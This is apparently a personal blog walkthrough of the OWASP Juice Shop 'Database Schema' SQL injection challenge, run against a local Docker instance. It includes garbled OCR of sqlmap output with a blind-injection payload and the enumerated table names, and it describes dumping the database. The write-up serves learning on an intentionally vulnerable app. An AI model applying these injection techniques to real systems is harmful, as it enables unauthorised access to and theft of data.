Challenge:
Name: Database Schema
Description: Exfiltrate the entire DB schema definition via SQL injection.
Difficulty: 3 star
Category: Injection
Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html
Tools used:
Burp, FoxyProxy, sqlmap
Resources used:
SQL Injection Payload Wordlist
OWASP SQL Injection Documentation
OWASP SQL Injection Bypassing WAF
Methodology:
SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led to using sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.
As sqlmap has differing levels of intensity (how noisy and potentially harmful it is to the target system), and because I’m running the application on Docker, I decided there was no real point in being quiet. As such I set up the program to be exceedingly thorough in its search of that input field.
![sqlmap identified the following injection point(s) with a total of 176 HTTP(s) r
equests :
Parameter: q (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
payload: q;' ) AND 3971=3971 AND ('CSPd' LIKE 'CSPd
[14:38:39] [
] testing SQLite
INFO
[14:38:39] [
] confirming SQLite
INFO
[14.
] [INFO
] actively fingerprinting SQL ite
• 38:39
[14.
] [INFO] the back-end DBMS is SQLite
• 38:39
back-end DBMS: SQLite
14:38:39] [WARNING] on SQLite it is not possible to enumerate databases (use on
y '--tables')
[14:38:39] [WARNING
] HTTP error codes detected during run:
5øø (Internal Server Error) -
140 times
[14:38:39] [
] fetched data logged to text files under '/home/colby/.local/s
INFO
are/sqlmap/output/localhost '
ending 14:38:39 /2020-11-02/](https://curiositykillscolby.files.wordpress.com/2020/11/image-58.jpeg?w=641)
What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.
![[14 : 40 :
] [INFO
] resuming back-end DBMS 'sqlite'
] [INFO] testing connection to the target URL
resumed the following injection point(s) from stored session:
sqlmap
)arameter: q (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
payload: q;' ) AND 3971=3971 AND ('CSPd' LIKE 'CSPd
] [INFO] the back-end DBMS is SQLite
'ack-end DBMS: SQLite
'40:50
'40:51
retrieved: Addresses
•40:52
retrieved: Baskets
'40:53
•40:55
'40:56
retrieved: Challenges
retrieved: Complaints
'40:57
•40:58
• 40
retrieved: Memories
'41:oo
•41:01
'41:02
retrieved: Quantities
•41:04
retrieved: Recycles
•41:04
•41:05
'41:07
retrieved: Wallets
•41:07
'41:08
[14:40:
] [INFO
] enumerating database management system schema
[14 • 40 :
. 50] [IN
O] fetching tables for database: 'SQL ite_masterdb'
[14 •40:
] fetching number of tables for database 'SQL ite_masterdb'
[WARNING
] running in a single-thread mode. Please consider usage of
'tion
[14.
114.
114.
114.
[14.
114.
114.
114.
[14.
114.
114.
[14.
[14.
114.
114.
114.
[14.
114.
[14.
[14.
[14.
114.
[14.
' --threads '
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
[INFO]
for faster data retrieval
retrieved
: 21
retrieved :
Users
retrieved :
sqlite_sequence
retrieved :
Products
retrieved :
Basketltems
retrieved :
Captchas
retrieved: Cards
retrieved :
Deliveries
retrieved :
Feedbacks
retrieved: ImageCaptchas
retrieved :
privacyRequests
retrieved :
purchaseQuantities
retrieved: SecurityQuestions
retrieved: SecurityAnswers
fetched tables: 'SQLite_masterdb.SecurityQuestions' , '
SQLite_m](https://curiositykillscolby.files.wordpress.com/2020/11/image-60.jpeg?w=636)
But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.
OK, a lot lost. After deciphering error after error, I narrowed down the number of tables I actually needed to enumerate to nine rather than 21. Knowing I was close, however, didn’t make this easier. Ultimately I gave in and read the solution. Had I replaced ‘1’ with ‘sql’ in my final query, it would have worked. Horseshoes and hand grenades, I suppose.
Because I had already used sqlmap and knew worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and database contents specifically, the more easily I’ll be able to solve future challenges.
Prevention and mitigation strategies:
Sanitize input fields!
Lessons Learned and Things Worth Mentioning:
- When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.
